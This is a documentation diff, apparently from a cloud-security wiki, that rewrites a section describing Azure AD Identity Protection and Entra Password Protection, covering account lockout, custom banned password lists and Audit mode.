+ +{% hint style="success" %} +Nowadays it's recommended to add these restrictions via Conditional Access policies where it's possible to configure the same options. +{% endhint %} -Azure AD Identity Protection (AIP) is a security service that uses **automated detection and remediation to help protect user identities in Azure Active Directory from being compromised**. AIP continuously monitors and assesses the risk of user sign-ins and identity configurations, **automatically applying appropriate security measures**, such as requiring multi-factor authentication or blocking potentially dangerous activities. This helps organizations prevent identity-based security breaches. +## Entra Password Protection -Flow: +Entra Password Protection ([https://portal.azure.com/#view/Microsoft\_AAD\_ConditionalAccess/PasswordProtectionBlade](https://portal.azure.com/#view/Microsoft_AAD_ConditionalAccess/PasswordProtectionBlade)) is a security feature that **helps prevent the abuse of weak passwords in by locking out accounts when several unsuccessful login attempts happen**.\ +It also allows to **ban a custom password list** that you need to provide. -1. Azure AD Identity Protection **monitors user activities** and collects data on user **sign-ins, authentication** events, and other relevant activities. -2. The service uses **machine learning** algorithms to analyze this data and detect potential security threats. -3. Azure AD Identity Protection **assigns a level of risk to the threat** (e.g. sign-in) and generate an alert if needed to perform some automatic action. +It can be **applied both** at the cloud level and on-premises Active Directory. -## Azure AD Password Protection (APP) +The default mode is **Audit**: -Azure AD Password Protection (APP) is a security feature that **helps prevent weak passwords in Azure Active Directory by enforcing strong password policies**. APP blocks **commonly used weak passwords** and their variants, reducing the risk of password-related breaches. It can be applied both at the cloud level and on-premises Active Directory, enhancing overall password security across the organization. +
-### References +## References * [https://learn.microsoft.com/en-us/azure/active-directory/roles/administrative-units](https://learn.microsoft.com/en-us/azure/active-directory/roles/administrative-units)